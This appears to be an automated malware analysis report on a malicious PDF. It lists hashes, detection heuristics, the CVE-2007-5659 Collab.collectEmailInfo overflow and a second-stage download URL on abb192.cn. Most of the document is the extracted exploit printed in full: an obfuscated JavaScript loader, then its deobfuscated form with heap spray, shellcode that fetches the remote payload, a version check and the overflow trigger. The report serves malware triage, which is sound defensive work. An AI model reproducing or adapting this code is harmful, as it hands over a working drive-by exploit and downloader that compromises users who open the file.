Malicious PDF — malware analysis report

Static analysis result for SHA-256 3d36aec3c15609dc…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-04-17
MD5: 419c1a1fac272aee74d6726303fbf373 SHA-1: 05d69ab3a79986dc336acfc6d9943c0df998c28d SHA-256: 3d36aec3c15609dcaf8087c60aa64d7c89d412365d0f38c24cc8299cb2ffaf5d
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is often employed to deobfuscate and execute malicious code. The extracted JavaScript object, javascript_obj0013_001.js, is likely responsible for the malicious behavior, potentially downloading and executing a second-stage payload. The confidence is moderate due to the obfuscated nature of the script.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function EgoTBkRRL4(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function T5wNW(zDuIncDnPZTi){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(zDuIncDnPZTi)"+";"+"}");eval("function Exsae(twmzemlMEM){var S2lMI1HUnhZ="+"0,TsmvhZW4ldSLeQ=twmzemlMEM.l"+"en"+"gth,PIxGNXCAWrx=10"+"2"+"4,FBe7AXs,cRcICGl,MCvWVsntQ14wr1='',WBtBL=S2lMI1HUnhZ,yRfW5=S2lMI1HUnhZ,aKjGFvCmQ6ZJ=S2lMI1HUnhZ,vMRRMgWYai=Ar"+"ra"+"y(63,3,12,54 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/spl3/load.php?id=869&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x368 6403 bytes
SHA-256: 390f1f82bfb233929cfa063278e2f15c08efaf468b15df1eb358fcca4ca21c13
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 167 of 232 identifiers look randomly generated (e.g. 'K4qQHRKGGn51yLmvwgNXSWKTH5qAK4qQHRKvvRJN'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function EgoTBkRRL4(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function T5wNW(zDuIncDnPZTi){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(zDuIncDnPZTi)"+";"+"}");eval("function Exsae(twmzemlMEM){var S2lMI1HUnhZ="+"0,TsmvhZW4ldSLeQ=twmzemlMEM.l"+"en"+"gth,PIxGNXCAWrx=10"+"2"+"4,FBe7AXs,cRcICGl,MCvWVsntQ14wr1='',WBtBL=S2lMI1HUnhZ,yRfW5=S2lMI1HUnhZ,aKjGFvCmQ6ZJ=S2lMI1HUnhZ,vMRRMgWYai=Ar"+"ra"+"y(63,3,12,54,13,41,29,26,0,60,0,0,0,0,0,0,62,21,56,28,44,49,15,22,46,17,32,38,25,4,50,35,16,24,57,19,27,8,42,11,23,39,47,0,0,0,0,48,0,52,61,2,5,10,53,45,51,1,6,14,31,33,9,43,58,37,40,59,20,36,18,30,55,34,7);f"+"o"+"r(cRcICGl=M"+"at"+"h.c"+"ei"+"l(TsmvhZW4ldSLeQ/"+"PIxGNXCAWrx)"+";cRcICGl>S2lMI1HUnhZ;cRcICGl-"+"-){fo"+"r(FBe7AXs=Ma"+"th.m"+"in(TsmvhZW4ldSLeQ,PIxGNXCAWrx);FBe7AXs>S2lMI1HUnhZ;FBe7AXs-"+"-,TsmvhZW4ldSLeQ-"+"-){aKjGFvCmQ6ZJ|"+"=(vMRRMgWYai[twmzemlMEM.cha"+"rCod"+"eAt(WBtBL+"+"+)-48])<"+"<yRfW5;if(yRfW5){MCvWVsntQ14wr1+"+"=T5wNW"+"(247^aKjGFvCmQ6ZJ&"+"2"+"5"+"5);aKjGFvCmQ6ZJ>"+">="+"8;yRfW5-"+"="+"2;}el"+"se{yRfW5="+"6"+";}}"+"}return (MCvWVsntQ14wr1);}var WmMfI=implode('',['Xzrqdw4','gT@T','gp7sEXo9f','LenJXTTmd7','5','O','ls4','hX','z5JL','vRJwyLKXSVmb','eT','_kzeml1','s','KIeL5OHbf','Le','To1x','eqzX','UHKvD','xXh','Bf8@5YT','eRf','l1sK','IeL5OKbKvKnu1@L','xdZCKN3p_gvREdyo','5','Ms','4','O_HL','u','vGprXh','gNX1sKIeL5ONDyX1s','K','IeL5OwgNX1sKI','eL5','OK4mcGnm1G','rYLcRxzZ6KN3p_gvRE','dyo5MO6Ewh9fd','eR','JcG','QKX1sKI','eL','5','ON9few6ucK','nq1pnKLw4u','aKLOM0D','D','FzTY4@gxXhBfi7','LmXX','WY@@eg','T','j','nK','4jWmgGBf','el','bEFw','2qzSREtw','2q2l6J','GGBfTcW5OG','D_PwB_','Xo','9fc','K5u','Mv5q','zeRxAWgJ','1','S9_M','W','g','J1S9_','MWgJ','1S9_','MWgJzz','o','Dfeg','JMSD_','feg','Jiz','2gkWg','JFlCg','k','WgJF','l9EjWg','JNjWEMWgJN','G9_MW','gJ','NGTD','3egJN@9EcWgJE','j','o','Da','egJEjTDEe','g','JFXW_EegJhjs_NegJNj','oDEegJiF','DDEe','gJNv','DgEegJkzT_1WgJ1XCDMWg','Jkz','T_1W','gJiW','o','D8WgJ','Nj','sEMWgJ','Njo','Dfeg','JiFDDEe','gJfp9E','MWgJiT9h','8WgJN7Dg','j','WgJz19EMWgJNjoEjWgJNjoD','Ee','g','J37T_iWgJfpDDfegJ8','1','9h','8WgJiWD','EjWgJ','z','1DDjW','gJN','joEE','egJNjoDEegJ','37T','_iWgJfpDD8W','gJa7sh','8WgJjlD_E','e','gJz','1CEhe','g','JNjsEhegJNjoDEegJ','3','7T_i','Wg','JfpD','D','MWgJzl9','h8WgJz','zTEj','Wg','Jz19h','Ee','gJNjWEfegJN','j','o','DEegJ37T_i','W','g','J','f','pCDEegJ','dW','s','h8W','g','JzToh','iWgJz1D_8WgJNj','TEkWgJNjoDE','e','gJ37T_iW','gJ3jTD','fegJ','hcC_EegJkTT','EaegJiz','D','EcWg','JEcDg3egJN@9Ei','WgJN','joD','NegJf7','DDEegJk','TT_iWgJiF2gfegJNGog3egJN','eshcWg','JiFCgiWgJ','E','cC','g3egJz1Cg','kW','g','JNjT_1Wg','JNjoDEegJF1CgEegJE','e9DkW','gJk','zWgzW','gJ809E8WgJNjoD','EegJizDDE','e','gJE','vDg3egJ','dTT_1WgJ','dzT_aegJizCgEegJajog3e','gJ','j','l9h8','WgJNjo','DEegJfjoDEegJ37T_','1','WgJFWCDfegJfjDDhegJf7','T_1','W','gJz','1CD8WgJNjshNegJN','joDEe','gJ37oDa','egJd02gEegJfvDDE','e','gJa','7DhjWgJd09h3egJNGogEegJFT','oh8WgJN','joDEe','gJkToEzWgJi','F2gEegJNvDg','3egJNeshcW','gJiFCgiWg','JEcCg3egJ3j','sE8WgJNjoDE','e','gJFWDDEegJf','cDDFWg','J3','7o','D','ae','gJ','h','vWgfegJfv','WE1WgJjlCg','aegJa','joh3e','gJfvTgEeg','J3','7T_','1WgJ','FWCDM','WgJfjD','D3','e','gJ','f7','T_1','WgJz1CD8WgJ','NjW','g','a','egJNjoD','EegJNjsh','cWgJkToEzWgJ','iF2g','EegJNcDg3egJNk','shcWgJiFC','gi','WgJ','EcCg3','e','g','JEjsE8WgJNjoDE','eg','JFWDDEegJi','FDEzWgJEj','o','g','3egJNeshc','Wg','JiF','C','giWgJEc','Cg','3egJNj','sE8WgJNjo','DE','egJ3eoDEe','gJfkTg1Wg','JzWoDaegJzWoDaegJzWoDaegJz','WoDaegJ','z','SC_','aegJ','feDDfe','gJiFCgaegJzFWEcW','gJfkoEFWgJzzoE','zWgJiF','Cg','3eg','JiF9EM','W','gJNcDhdWgJfG','C_1','W','gJfpDDMW','gJkST_1','WgJiF9DM','WgJE7Dhfe','gJN','vo','h8WgJfpDE','a','egJksC_1','WgJNvWgEegJhvoE','ae','gJ3jCEiWgJ1X','Dg','N','egJ','d','S','oDae','gJhvTgkW','gJNwDEkWg','JEjo_jWgJj','FsDc','WgJNcDhf','egJ','dTCEN','e','gJ','NvoDd','WgJ3joEheg','J','jWsE1WgJjT9','D1','W','g','J','kTTgjWgJfe9E3egJzFC','_1W','gJf','eC_1WgJNvWgfe','g','JFs2EdWgJNvC_1WgJiF','Dg1','WgJ','EvCgcWgJMXDDaegJ','NGT_','1Wg','JNvT_1','WgJ','f7CE','3egJdFTgdWgJ','NjoD8Wg','JjXsE8WgJj','lDEjW','gJf7oE','z','WgJ3vCghegJ','3wDgdWgJNjog','jWgJ','8FC_FWg','J8l2_1W','gJdzWE3eg','JiTCEEegJiX','C_d','Wg','J','Ms','2EjW','gJdWWEdWg','JiW','T_MWg','J8SCE','EegJi','SW_zWgJd','zWEMWgJ','iz','T','_aegJi','FC_jWgJ8lCENe','gJ8lC','_FW','gJis2EEegJMFT_1WgJMz2EFWgJd','z2EkWgJ','8l2_MWgJMFT_aegJz','l2','E1Xg','x2l','6JG','G','Bf','uVor','qeWrM','jVOpc','p_M','lgNXl9','O1l9','E','z','l9E2','l6','J','GGBfZH5ZY7','5rXo9fTcW5OGD_PwB_LZ5uL','cRJlw','6xXX2h','Xzrqd','w6KN3p_gvRE','dyo','5MlgNXSV','H','yGVD','JvQrk','V','Wr1S9f7lbxZH5Z','Y75rCl9OM0','Dx','2l6JG','GBf','_H','LuvGprXo9fcK5uMv5qzeRxAWg','J','klDhz','W','g','J','klD','hzXgx2l4DTj5uq','kpf','e','l','45j','3o','DisCrM@4DTj5uqk','p','3XY5DgkCotwCmB7eEwh9fi7LmX','W7Z','p7D5Q','KLZiwgNX06gCpso','aHLuQ3QDM37mXob','fz0B','_z','l9E','zlDxQS','V','HyG','VDJ','vQrkVWr','1S2hXznKdwbxi','7LmXz','5ZzvT','Ezy5','J','G@257vBh','el2hIpsmaG9mQerq','FSVKM@9Ny','3oHjTe','KL3','TJ2z5Zzv','TEzy5JG@257vBh','Ch','g','xXhB','faH','RZ','fVog','zh7u@','w','Ug','dl','U','Kc7RhuVnmFo','p','fel4DT','j5','uqkpfClb','K_','vprdW2uz','k2hX','oB','few6uc','Knq1pnK','Lw6q','@vBuZwp','xwl4OXzrq','d','w','4JBkr','oqw','g','NX','TRmzK6JwenJvGQrvG','Umwy','LKLFUKukQmwKnuls4h','X1UH','1','p75Xo9f8','ysJHG7','3d','e','RmT7nqv@43','okW3','P','H6fAs4hXzrqdwgqH@ngk','@sYK@5E7pL5GwgNXY5u8wggdGrq','k@','4','JB','kroqK4q','l','7Lm3kBx','z','sb38ys','JHG73','t','@5qd7sJlTDxT1UH1p75L','SRY','G','Grg1@6','Ews','4hXsLuX0b','xGpp','Yap','BZl7','pYjo5Yq7','nozopfe','o9f','Fl6aI','lbxlT5olvoO0@55l7DKwGVqD7','D','VXoDNXT9fIz','bfGppYapBZl','7pYjo5Yq7nodo','pfWl','6Ewlby','WwgqH@ngk@sYK@5E','7p','L5GNVEVwbNX','TDxwl','by','WwbxG','ppYapBZl7pYjo5Yq','7noz','opfeo9f8l6aIlgqH@ngk@sYK@5E7pL5','GNVEVwbNXTDxXZ','By','X0gqH@ngk@sYK@5','E','7p','L5GNpEVw','bNX1','Dxwl4OX1ngL3','UEFW','s','hE3LOls4hXzrqdw','ggJeU','JzV5qpvshB7R','felgJLenmt7Rmv@6','fv','WBE','tw2qv','W','BEtw2qAs4hX','1BYwH5ulT','Wr','ccBm','775','Ha@2HG','Kb','Kv','Knu1@','Rf','Wlb_1','sD_dsbf3cVJ8wrK','GV','W','gFOoqXhgNXTW','rccBm775Ha@2HGN9','f','1@5','YM','K4qQHRKGGn51yLmvwgNXSWKTH5qAK4qQHRKvvRJNV5','qwH5Z','LjnKlhUmcGL','Y4l6fAZgKMcLhXTW','r','ccBm775Ha@2','HGVrx','2lg','yXoBfA','pW','mS@p5ls4h']);");eval(Exsae(WmMfI));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x368 2592 bytes
SHA-256: 4199ae3fb0b16a04e8cd1f3a5013152056f58a39b6f47602c7eebc6dce515ef1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var ClHBMA0 = new Array(); function SqJE69Vs(GlfeRT, nEZ4Zc0rOQ3) { while (GlfeRT.length*2<nEZ4Zc0rOQ3){GlfeRT += GlfeRT;} GlfeRT = GlfeRT.substring(0,nEZ4Zc0rOQ3/2); return GlfeRT; } function gCnz38E8Fjz() { var BkIXClfozFsZr = 0x0c0c0c0c; var lGST25gp4 = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u732F%u6C70%u2F33%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3638%u2639%u7073%u3D6C%u0034"); var SMUREWsVyMW43 = 0x400000; var XlIPaU = lGST25gp4.length * 2; var nEZ4Zc0rOQ3 = SMUREWsVyMW43 - (XlIPaU+0x38); var GlfeRT = unescape("%u9090%u9090"); GlfeRT = SqJE69Vs(GlfeRT, nEZ4Zc0rOQ3); var UJM1QonJv = (BkIXClfozFsZr - 0x400000)/SMUREWsVyMW43; for (var fIpC2poua8Sms8=0;fIpC2poua8Sms8<UJM1QonJv;fIpC2poua8Sms8++) { ClHBMA0[fIpC2poua8Sms8] = GlfeRT + lGST25gp4; } } function bIsdXP() { var wOtYR = app.viewerVersion.toString(); wOtYR = wOtYR.replace(/\D/g,""); var aYhCyHhQh1miRa = new Array(wOtYR.charAt(0),wOtYR.charAt(1),wOtYR.charAt(2)); if ((aYhCyHhQh1miRa[0] == 8 && ((aYhCyHhQh1miRa[1] == 1 && aYhCyHhQh1miRa[2] < 2) || aYhCyHhQh1miRa[1] < 1)) || (aYhCyHhQh1miRa[0] == 7 && aYhCyHhQh1miRa[1] < 1) || (aYhCyHhQh1miRa[0] < 7)) { gCnz38E8Fjz(); var AWuwpmaMC8Oa = unescape("%u0c0c%u0c0c"); while(AWuwpmaMC8Oa.length < 44952) AWuwpmaMC8Oa += AWuwpmaMC8Oa; this.collabStore = Collab.collectEmailInfo({subj: "",msg: AWuwpmaMC8Oa}); } } bIsdXP();